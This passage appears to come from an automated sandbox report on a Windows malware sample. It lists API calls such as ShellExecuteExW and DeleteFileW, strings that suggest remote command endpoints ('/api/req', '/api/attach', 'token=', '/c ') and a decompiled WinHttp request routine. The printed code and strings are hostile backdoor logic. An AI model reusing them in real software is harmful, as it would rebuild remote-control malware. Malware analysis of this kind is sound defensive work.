bdf4d2-bdf4d5 95->99 96->95 102 bdf4f8-bdf50c 98->102 103 bdf4f0-bdf4f3 98->103 99->98 105 bdf50e-bdf511 102->105 106 bdf516-bdf520 102->106 103->102 105->106 108 bdf63f-bdf665 106->108 109 bdf526-bdf532 106->109 111 bdf66f-bdf684 108->111 112 bdf667-bdf66a 108->112 113 bdf538-bdf546 109->113 114 bdf635-bdf63c call bf4b47 109->114 117 bdf68e-bdf690 111->117 118 bdf686-bdf689 111->118 112->111 113->40 119 bdf54c 113->119 114->108 122 bdf709-bdf724 call bf44d0 117->122 118->117 119->114 128 bdf56f-bdf583 124->128 129 bdf567-bdf56a 124->129 125->33 127 bdf24b-bdf256 SysAllocStringLen 125->127 127->37 132 bdf25c-bdf25e 127->132 130 bdf58d-bdf5a1 128->130 131 bdf585-bdf588 128->131 129->128 133 bdf5ab-bdf5bf 130->133 134 bdf5a3-bdf5a6 130->134 131->130 135 bdf260 call bdec90 132->135 136 bdf5c9-bdf5dd 133->136 137 bdf5c1-bdf5c4 133->137 134->133 138 bdf265-bdf267 135->138 139 bdf5df-bdf5e2 136->139 140 bdf5e7-bdf603 call be5f90 136->140 137->136 141 bdf28e-bdf2ae call be8500 call bdeb40 138->141 142 bdf269-bdf288 call bfc92f SleepEx DeleteFileW 138->142 139->140 150 bdf60d-bdf622 140->150 151 bdf605-bdf608 140->151 141->124 155 bdf2b4-bdf2b8 141->155 142->141 152 bdf628-bdf630 150->152 153 bdf707 150->153 151->150 152->153 153->122 157 bdf2be-bdf2c8 call be4f30 155->157 158 bdf480-bdf494 155->158 157->158 162 bdf2ce-bdf30b call bf7a10 call bd73a0 157->162 158->93 160 bdf496-bdf499 158->160 160->93 167 bdf30d 162->167 168 bdf30f-bdf361 call be5870 call be5f90 call bf7a10 call bd73a0 162->168 167->168 177 bdf365-bdf45a call be5870 call be5f90 call be5870 * 2 call be4f70 * 3 call be5850 * 4 call be8500 * 2 call bd9ce0 168->177 178 bdf363 168->178 206 bdf45f-bdf47b call be5850 * 3 177->206 178->177 206->158
                                  APIs
                                  • CreateDirectoryW.KERNEL32(?,00000000,?,00C26C58,?,00C26C58), ref: 00BDF18D
                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 00BDF23F
                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 00BDF252
                                    • Part of subcall function 00BDEC90: CoInitialize.OLE32(00000000), ref: 00BDECE9
                                    • Part of subcall function 00BDEC90: CoCreateInstance.OLE32(00C1A2C0,00000000,00000001,00C1A2B0,?), ref: 00BDED08
                                  • SleepEx.KERNEL32(?,00000000,?,?,?,00C26C58,?,00C26C58), ref: 00BDF27F
                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,00C26C58,?,00C26C58), ref: 00BDF288
                                    • Part of subcall function 00BD9CE0: ShellExecuteExW.SHELL32(?), ref: 00BD9D3A
                                    • Part of subcall function 00BD9CE0: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BD9D45
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocCreateString$DeleteDirectoryExecuteFileInitializeInstanceObjectShellSingleSleepWait
                                  • String ID: > "$" /F$' '$.zip$/api/attach$/api/req$/c $0/$4$IjkiCA==$Pj0mFDk=$Yyw/Aw==$\txc1.txt$\txc1.txt" && type "$\txc1.txt" > "$\txc2.txt$\txc2.txt"$`$cannot get value$cannot use operator[] with a numeric argument with $cannot use operator[] with a string argument with $data$dir$exe$exit$name$remove_reg$request$ss"}$tion"}$token=$type$url$y '${"status":"success","result":"
                                  • API String ID: 3126972231-2927576387
                                  • Opcode ID: 72fc88850650ca3da28da8fc76c6efd9ac9e690f75617ff637a5da2e34f012c4
                                  • Instruction ID: c9481fd3ed795d902bfd4e63e694e11989b82ae784743199857f54ae267cac0f
                                  • Opcode Fuzzy Hash: 72fc88850650ca3da28da8fc76c6efd9ac9e690f75617ff637a5da2e34f012c4
                                  • Instruction Fuzzy Hash: 0F42A030905649DBEB10DF68C849B9DFBF5EF55314F1882E9E419AB392EB309E04CB91
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00BE0090, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 228UNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,5CB9E59C), ref: 00BE00DA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileModuleName
                                  • String ID: type
                                  • API String ID: 514040917-2363381545
                                  • Opcode ID: 51a120f43e6620147e25fc700a08610f27fa27289b928771d209f8d72d7bb2e1
                                  • Instruction ID: 0700d9d71c111a1c40ad561004dd36035bfa7097a0e893f0c68b155f02eaf161
                                  • Opcode Fuzzy Hash: 51a120f43e6620147e25fc700a08610f27fa27289b928771d209f8d72d7bb2e1
                                  • Instruction Fuzzy Hash: 0071E671900248EBEB10EF69CC46BDEB7F9EB04700F5041D9F915A76C2DB746A44CBA6
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00BD9CE0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51synchronizationUNIQUE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 489 bd9ce0-bd9d5e ShellExecuteExW WaitForSingleObject 490 bd9d68-bd9d77 489->490 491 bd9d60-bd9d63 489->491 492 bd9d79-bd9d7c 490->492 493 bd9d81-bd9d84 490->493 491->490 492->493
                                  APIs
                                  • ShellExecuteExW.SHELL32(?), ref: 00BD9D3A
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BD9D45
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteObjectShellSingleWait
                                  • String ID: <$@
                                  • API String ID: 1289292659-1426351568
                                  • Opcode ID: c0bbf89e5a8d38af17b04520724dc9eed95460104f59c44db683645bcffcae7b
                                  • Instruction ID: ba7a551204679e5ec35c615563d56b6fe48b56565afd965d4a0c16121a5c46d9
                                  • Opcode Fuzzy Hash: c0bbf89e5a8d38af17b04520724dc9eed95460104f59c44db683645bcffcae7b
                                  • Instruction Fuzzy Hash: 77113A71D016199BDB00CFA8C848B8EFBF5FF49324F248359E824AA2A4E7758944CFD0
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Function 00BE5750, Relevance: 2.6, APIs: 2, Instructions: 68COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 502 be5750-be575d 503 be57be-be57cb call be73e0 502->503 504 be575f-be5775 MultiByteToWideChar 502->504 504->503 505 be5777-be5788 504->505 508 be578a-be5792 call be8590 505->508 509 be5794-be57a8 MultiByteToWideChar 505->509 508->509 511 be57ce-be57d8 call bd3ea0 509->511 512 be57aa-be57bb 509->512
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,?,00000000,?,00BD9B59,?,?), ref: 00BE576A
                                  • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,?,?,00000000,?,00BD9B59,?,?), ref: 00BE579D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide
                                  • String ID:
                                  • API String ID: 626452242-0
                                  • Opcode ID: 0e5bc773effefb50cac619224efd897b538fc48d6514abde6979110d40868d40
                                  • Instruction ID: b3a7cf2edb09473ffccf76e3f7e5306e243e4bbfbad8f72b726f3a709ad6860d
                                  • Opcode Fuzzy Hash: 0e5bc773effefb50cac619224efd897b538fc48d6514abde6979110d40868d40
                                  • Instruction Fuzzy Hash: 7C110432301216AFD6209B4ADC89F6EF799EF84764F20425AF7159B3C0CB20AC1187A0
                                  Uniqueness

                                  Uniqueness Score: 0.08%

                                  Function 00C0C6D1, Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 516 c0c6d1-c0c6de call c06876 518 c0c6e3-c0c6ee 516->518 519 c0c6f0-c0c6f2 518->519 520 c0c6f4-c0c6fc 518->520 521 c0c73f-c0c74b call c068d3 519->521 520->521 522 c0c6fe-c0c702 520->522 523 c0c704-c0c739 call c09972 522->523 528 c0c73b-c0c73e 523->528 528->521
                                  APIs
                                    • Part of subcall function 00C06876: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C0710F,00000001,00000364,00000006,000000FF,?,?,?,00C0185C,00C06950), ref: 00C068B7
                                  • _free.LIBCMT ref: 00C0C740
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap_free
                                  • String ID:
                                  • API String ID: 614378929-0
                                  • Opcode ID: a30e8605a2eb8de14869478dd35ca90c301679f309bffa3130f202b4217855f8
                                  • Instruction ID: 726449149e039d56a40967bc445cb45d0cbc4cfbe658db81551cfe2246b693f5
                                  • Opcode Fuzzy Hash: a30e8605a2eb8de14869478dd35ca90c301679f309bffa3130f202b4217855f8
                                  • Instruction Fuzzy Hash: C801F972A043566BC721CF98D8C199AFB98EB053B0F150769E565B76C0E770AD10CBA4
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  Function 00C06876, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 529 c06876-c06881 530 c06883-c0688d 529->530 531 c0688f-c06895 529->531 530->531 532 c068c3-c068ce call c01857 530->532 533 c06897-c06898 531->533 534 c068ae-c068bf RtlAllocateHeap 531->534 538 c068d0-c068d2 532->538 533->534 535 c068c1 534->535 536 c0689a-c068a1 call c051e3 534->536 535->538 536->532 542 c068a3-c068ac call c027bf 536->542 542->532 542->534
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00C0710F,00000001,00000364,00000006,000000FF,?,?,?,00C0185C,00C06950), ref: 00C068B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 952dd83fd909b54e25898e6406f37245199fc2b010e1db7aa93a9cbb94a152ef
                                  • Instruction ID: e45f3c6566bf66a6935efbdcfc0984c405d7eac568a307e5a07bcc652e7bd2ec
                                  • Opcode Fuzzy Hash: 952dd83fd909b54e25898e6406f37245199fc2b010e1db7aa93a9cbb94a152ef
                                  • Instruction Fuzzy Hash: 35F0BE316002246BEB212F62DC09F5A7748AB41770F18C321EC28A61D0CA30EA26D7B0
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Function 00C0690D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 545 c0690d-c06919 546 c0694b-c06956 call c01857 545->546 547 c0691b-c0691d 545->547 555 c06958-c0695a 546->555 549 c06936-c06947 RtlAllocateHeap 547->549 550 c0691f-c06920 547->550 551 c06922-c06929 call c051e3 549->551 552 c06949 549->552 550->549 551->546 557 c0692b-c06934 call c027bf 551->557 552->555 557->546 557->549
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00BF48E0,?,?,00BE8B4A,?,?,00BD1154), ref: 00C0693F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.644450642.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                  • Associated: 00000000.00000002.644431700.0000000000BD0000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644600257.0000000000C2E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_bd0000_qtjRj8L3Rw.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: a7880056ec5d177290b10d27f97063bf49d9722ef9ef9d0dfff90b1bb282015d
                                  • Instruction ID: 3cf6e58dcc8bbbc974f97b64762984201c3aaaa1cdc544171c474762430a11a2
                                  • Opcode Fuzzy Hash: a7880056ec5d177290b10d27f97063bf49d9722ef9ef9d0dfff90b1bb282015d
                                  • Instruction Fuzzy Hash: C7E06D3120522166DA322E669D04F5F7A889B427B0F194124EC25979D4DA30DE21D6A1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Non-executed Functions

                                  Function 00BD5230, Relevance: 102.8, APIs: 47, Strings: 11, Instructions: 1319UNIQUECrypto
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E00BD5230(void* __ebx, signed int* __ecx, void* __edx, void* __edi, signed int __esi, char _a4, signed int _a20, intOrPtr _a24) {
				signed int _v4;
				int _v8;
				intOrPtr _v12;
				unsigned int _v13;
				signed char _v14;
				unsigned char _v15;
				signed char _v16;
				char _v17;
				unsigned int _v18;
				unsigned char _v19;
				signed int _v20;
				signed char _v21;
				char _v22;
				signed char _v23;
				unsigned char _v24;
				intOrPtr _v25;
				unsigned char _v26;
				signed char _v28;
				signed char _v32;
				signed int _v36;
				signed char _v40;
				signed char _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				unsigned char _v64;
				intOrPtr _v68;
				signed int _v84;
				unsigned char _v88;
				unsigned char _v92;
				intOrPtr _v132;
				signed int _v140;
				signed char _v144;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v180;
				intOrPtr _v184;
				unsigned char _v188;
				intOrPtr _v196;
				int _v208;
				char _v216;
				signed int _v220;
				char _v348;
				void* _v352;
				unsigned char _v356;
				char _v540;
				char _v1060;
				char _v1580;
				char _v4180;
				signed int _v4184;
				int _v4188;
				void* _v4192;
				char _v4196;
				char _v4204;
				signed int _v4208;
				intOrPtr _v4212;
				char _v4228;
				signed int _v4232;
				int _v4236;
				char _v4252;
				signed int _v4256;
				int _v4260;
				short _v4276;
				int _v4280;
				char _v4281;
				signed int _v4288;
				int _v4292;
				signed int _v4296;
				char _v4297;
				signed int _v4304;
				signed int _v4308;
				int _v4312;
				int _v4316;
				int _v4320;
				int _v4324;
				int _v4328;
				int _v4332;
				long _v4336;
				signed int _v4340;
				short* _v4344;
				signed int* _v4348;
				signed int _v4352;
				void* _v4356;
				void* _v4360;
				char _v4364;
				char* _v4368;
				char* _v4372;
				signed int _v4376;
				int _v4380;
				char* _v4384;
				signed int _v4388;
				int _v4392;
				int _v4396;
				int _v4400;
				signed int _v4404;
				int _v4408;
				signed int _v4412;
				intOrPtr _v4424;
				char* _v4428;
				int _v4432;
				intOrPtr _v4448;
				intOrPtr _v4452;
				char* _v4456;
				int _v4460;
				int _v4464;
				int _v4468;
				char _v4472;
				void* __ebp;
				signed int _t682;
				signed int _t683;
				char _t685;
				signed int _t689;
				signed int _t692;
				long _t693;
				intOrPtr _t696;
				signed int _t702;
				signed int _t703;
				intOrPtr _t711;
				intOrPtr _t714;
				signed char _t724;
				unsigned char _t727;
				signed int _t730;
				unsigned char _t735;
				signed int _t739;
				signed int _t743;
				void* _t744;
				signed int _t751;
				signed int _t754;
				signed int _t756;
				char _t757;
				signed char _t758;
				signed int _t760;
				signed int _t767;
				signed int _t768;
				signed int _t772;
				intOrPtr _t774;
				intOrPtr* _t776;
				char _t781;
				signed char _t782;
				signed char _t785;
				unsigned char _t794;
				signed char _t798;
				signed char _t822;
				signed int _t824;
				char* _t829;
				signed int _t837;
				signed int _t838;
				signed int _t841;
				long _t842;
				signed int _t843;
				long _t844;
				signed int _t845;
				signed int _t850;
				signed int _t852;
				signed int _t857;
				signed int _t862;
				signed int* _t864;
				signed int _t865;
				signed int _t873;
				signed int _t879;
				intOrPtr _t880;
				int _t888;
				intOrPtr _t894;
				signed int _t904;
				signed int _t907;
				signed int _t919;
				signed int _t933;
				signed int _t936;
				signed int _t942;
				signed int _t945;
				signed int _t948;
				signed int _t954;
				intOrPtr _t960;
				intOrPtr _t964;
				signed int _t971;
				signed int _t972;
				signed int _t976;
				void* _t980;
				signed int _t983;
				intOrPtr _t985;
				intOrPtr _t989;
				intOrPtr* _t998;
				signed int _t1004;
				signed int _t1007;
				intOrPtr* _t1012;
				signed int _t1015;
				signed int _t1016;
				void* _t1017;
				signed int _t1024;
				void* _t1025;
				void* _t1026;
				signed int _t1035;
				signed int _t1036;
				void* _t1037;
				void* _t1038;
				signed int* _t1044;
				signed int _t1048;
				signed int _t1049;
				intOrPtr _t1056;
				signed int _t1060;
				void* _t1062;
				signed int _t1064;
				intOrPtr _t1065;
				void* _t1067;
				signed char _t1068;
				signed char _t1070;
				unsigned char _t1071;
				void* _t1074;
				void* _t1076;
				signed int* _t1078;
				unsigned char _t1088;
				signed int _t1097;
				void* _t1099;
				unsigned char _t1100;
				intOrPtr _t1101;
				unsigned char _t1108;
				intOrPtr* _t1110;
				signed int _t1113;
				intOrPtr _t1121;
				unsigned char _t1124;
				char _t1130;
				signed char _t1134;
				signed char _t1136;
				signed char _t1137;
				intOrPtr _t1138;
				void* _t1139;
				unsigned char _t1143;
				intOrPtr _t1146;
				signed int _t1149;
				intOrPtr* _t1152;
				long _t1158;
				signed int _t1160;
				intOrPtr* _t1184;
				char* _t1185;
				int _t1187;
				char _t1188;
				signed int _t1189;
				void* _t1190;
				char* _t1191;
				short* _t1193;
				signed int _t1194;
				unsigned int _t1197;
				unsigned int _t1199;
				int _t1201;
				intOrPtr* _t1203;
				signed int _t1204;
				intOrPtr* _t1207;
				char* _t1212;
				char* _t1214;
				char* _t1216;
				signed int _t1219;
				signed int _t1220;
				void* _t1221;
				char _t1222;
				intOrPtr _t1228;
				intOrPtr _t1229;
				intOrPtr* _t1232;
				char* _t1233;
				signed int* _t1242;
				signed int* _t1243;
				signed int _t1245;
				intOrPtr _t1247;
				void* _t1248;
				signed int _t1249;
				intOrPtr _t1250;
				unsigned int _t1251;
				unsigned char _t1258;
				signed char _t1259;
				signed char _t1263;
				signed int _t1266;
				signed char _t1267;
				intOrPtr _t1268;
				signed char _t1272;
				void* _t1273;
				unsigned char _t1278;
				void* _t1283;
				char _t1287;
				unsigned char _t1288;
				signed char _t1294;
				intOrPtr _t1295;
				signed int _t1296;
				void* _t1304;
				signed int _t1311;
				signed int _t1312;
				intOrPtr* _t1315;
				int _t1316;
				signed int _t1318;
				short* _t1319;
				signed int _t1320;
				signed int _t1321;
				intOrPtr* _t1322;
				signed int _t1324;
				signed int _t1325;
				signed int _t1326;
				void* _t1327;
				void* _t1328;
				signed int* _t1330;
				signed int _t1332;
				char _t1334;
				signed char _t1336;
				signed int _t1339;
				signed int _t1342;
				void* _t1344;
				unsigned char _t1346;
				unsigned char _t1347;
				signed int _t1348;
				signed int _t1349;
				unsigned char _t1351;
				unsigned char _t1353;
				signed int _t1355;
				signed int _t1356;
				signed int _t1360;
				unsigned char _t1362;
				intOrPtr _t1364;
				signed int _t1365;
				intOrPtr* _t1366;
				signed int _t1367;
				int _t1368;
				int _t1369;
				short* _t1370;
				signed int _t1371;
				signed int _t1374;
				signed int _t1375;
				signed int _t1378;
				signed int _t1379;
				void* _t1380;
				void* _t1381;
				signed int _t1382;
				void* _t1383;
				signed int _t1384;
				void* _t1386;
				void* _t1388;
				signed int _t1389;
				void* _t1392;
				void* _t1393;
				void* _t1394;
				void* _t1395;
				void* _t1396;
				void* _t1397;
				void* _t1400;
				void* _t1401;

				_t1349 = __esi;
				_t1248 = __edx;
				_t1062 = __ebx;
				_push(0xffffffff);
				_push(0xc16ed2);
				_push( *[fs:0x0]);
				E00C16440();
				_t682 =  *0xc2e00c; // 0x5cb9e59c
				_t683 = _t682 ^ _t1378;
				_v20 = _t683;
				_push(__esi);
				_push(__edi);
				_push(_t683);
				 *[fs:0x0] =  &_v16;
				_t1330 = __ecx;
				_v4348 = __ecx;
				_t685 = _a4;
				if(__ecx[6] > 0) {
					E00BE5D90( &_v4228, _t685);
					_v8 = 0;
					__eflags = _v4208 - 8;
					_t688 =  >=  ? _v4228 :  &_v4228;
					_t689 = E00BFD709(__ecx, __esi,  >=  ? _v4228 :  &_v4228, L"GET");
					_t1384 = _t1383 + 8;
					__eflags = _t689;
					if(_t689 != 0) {
						__eflags = _v4208 - 8;
						_t691 =  >=  ? _v4228 :  &_v4228;
						_t692 = E00BFD709(_t1330, __esi,  >=  ? _v4228 :  &_v4228, L"POST");
						_t1384 = _t1384 + 8;
						__eflags = _t692;
						if(_t692 != 0) {
							_t693 = 0x57;
							goto L213;
						} else {
							_t829 = L"POST";
							_t1149 = 4;
							goto L6;
						}
					} else {
						_t829 = L"GET";
						_t1149 = 3;
						L6:
						_push(_t1149);
						E00BE7B00(_t1062,  &_v4228, _t1248, _t1330, _t829);
						__eflags =  *_t1330;
						_v4281 = 1;
						if( *_t1330 != 0) {
							L11:
							__imp__WinHttpSetTimeouts( *_t1330, _t1330[0x5e], _t1330[0x5f], _t1330[0x60], _t1330[0x61]);
							E00BF71C0(_t1330,  &_v1060, 0, 0x208);
							E00BF71C0(_t1330,  &_v4180, 0, 0xa28);
							_v4468 = 0;
							_v4456 =  &_v1060;
							asm("xorps xmm0, xmm0");
							_v4460 = 0;
							_t1384 = _t1384 + 0x18;
							_v4428 =  &_v4180;
							__eflags = _t1330[7] - 8;
							_t837 =  &(_t1330[2]);
							asm("movlpd [ebp-0x115c], xmm0");
							asm("movlpd [ebp-0x1154], xmm0");
							_v4432 = 0;
							asm("movlpd [ebp-0x1140], xmm0");
							_v4472 = 0x3c;
							_v4452 = 0x104;
							_v4424 = 0x514;
							_v4464 = 1;
							if(_t1330[7] >= 8) {
								_t837 = _t1330[2];
							}
							__imp__WinHttpCrackUrl(_t837, _t1330[6], 0,  &_v4472);
							__eflags = _t837;
							if(_t837 == 0) {
								goto L214;
							} else {
								_t1152 =  &_v1060;
								_t1304 = _t1152 + 2;
								do {
									_t838 =  *_t1152;
									_t1152 = _t1152 + 2;
									__eflags = _t838;
								} while (_t838 != 0);
								E00BE7B00(_t1062,  &(_t1330[8]), _t1304, _t1330,  &_v1060);
								_t841 =  &_v1060;
								__imp__WinHttpConnect( *_t1330, _t841, _v4448, 0, _t1152 - _t1304 >> 1);
								_v4352 = _t841;
								__eflags = _t841;
								if(_t841 == 0) {
									goto L214;
								} else {
									__eflags = _v4460 - 2;
									_t1157 =  ==  ? 0x800000 : 0;
									__eflags = _v4208 - 8;
									_t1307 =  >=  ? _v4228 :  &_v4228;
									__imp__WinHttpOpenRequest(_t841,  >=  ? _v4228 :  &_v4228, _v4428, 0, 0, 0,  ==  ? 0x800000 : 0);
									_t1349 = _t841;
									_v4296 = _t1349;
									__eflags = _t1349;
									if(_t1349 == 0) {
										L211:
										__imp__WinHttpCloseHandle(_v4352);
										goto L214;
									} else {
										__eflags = _t1330[1];
										if(_t1330[1] == 0) {
											__eflags = _v4460 - 2;
											if(_v4460 == 2) {
												_v4280 = 0x3100;
												__imp__WinHttpSetOption(_t1349, 0x1f,  &_v4280, 4);
											}
										}
										_t1158 = 0;
										__eflags = 0;
										while(1) {
											L22:
											_t842 = _t1158;
											_v4336 = _t1158 + 1;
											__eflags = _t842 - 3;
											if(_t842 >= 3) {
												break;
											} else {
												_t1160 = _t1330[0x36];
												__eflags = _t1160;
												if(_t1160 != 0) {
													__eflags = _t1330[0x37] - 8;
													_t842 =  &(_t1330[0x32]);
													if(_t1330[0x37] >= 8) {
														_t842 =  *_t842;
													}
													__imp__WinHttpAddRequestHeaders(_t1349, _t842, _t1160, 0x1000000);
													__eflags = _t842;
													if(_t842 == 0) {
														_t842 = GetLastError();
														_t1330[0x3e] = _t842;
													}
												}
											}
											__eflags = _t1330[0x2e];
											if(_t1330[0x2e] <= 0) {
												L37:
												__eflags = _t1330[0x3c];
												if(_t1330[0x3c] > 0) {
													_v4380 = 0;
													_v4388 = 3;
													E00BF71C0(_t1330,  &_v540, 0, 0x208);
													_t1044 =  &(_t1330[0x38]);
													_t1392 = _t1384 + 0xc;
													__eflags = _t1044[5] - 8;
													if(_t1044[5] >= 8) {
														_t1044 =  *_t1044;
													}
													E00C00FED( &_v540, 0x104, _t1044);
													_t1384 = _t1392 + 0xc;
													_v4384 =  &_v540;
													_t1048 =  &_v4388;
													__imp__WinHttpSetOption(_t1349, 0x26, _t1048, 0xc);
													__eflags = _t1048;
													if(_t1048 == 0) {
														_t1330[0x3e] = GetLastError();
													}
													_t842 = _t1330[0x50];
													__eflags = _t842;
													if(_t842 != 0) {
														__eflags = _t1330[0x51] - 8;
														_t1242 =  &(_t1330[0x4c]);
														if(_t1330[0x51] >= 8) {
															_t1242 =  *_t1242;
														}
														_t1049 = _t842 + _t842;
														__imp__WinHttpSetOption(_t1349, 0x1002, _t1242, _t1049);
														__eflags = _t1049;
														if(_t1049 == 0) {
															_t1330[0x3e] = GetLastError();
														}
														_t842 = _t1330[0x56];
														__eflags = _t842;
														if(_t842 != 0) {
															__eflags = _t1330[0x57] - 8;
															_t1243 =  &(_t1330[0x52]);
															if(_t1330[0x57] >= 8) {
																_t1243 =  *_t1243;
															}
															_t842 = _t842 + _t842;
															__imp__WinHttpSetOption(_t1349, 0x1003, _t1243, _t842);
															__eflags = _t842;
															if(_t842 == 0) {
																_t842 = GetLastError();
																_t1330[0x3e] = _t842;
															}
														}
													}
												}
												_v4340 = 0;
												__imp__WinHttpSendRequest(_t1349, 0, 0, 0, 0, 0, 0);
												__eflags = _t842;
												if(_t842 != 0) {
													L76:
													_t843 = _t1330[0x30];
													__eflags = _t843;
													if(_t843 != 0) {
														_v4280 = 0;
														__imp__WinHttpWriteData(_t1349, _t843, _t1330[0x31],  &_v4280);
														__eflags = _t843;
														if(_t843 == 0) {
															_t843 = GetLastError();
															_t1330[0x3e] = _t843;
														}
													}
													__imp__WinHttpReceiveResponse(_t1349, 0);
													__eflags = _t843;
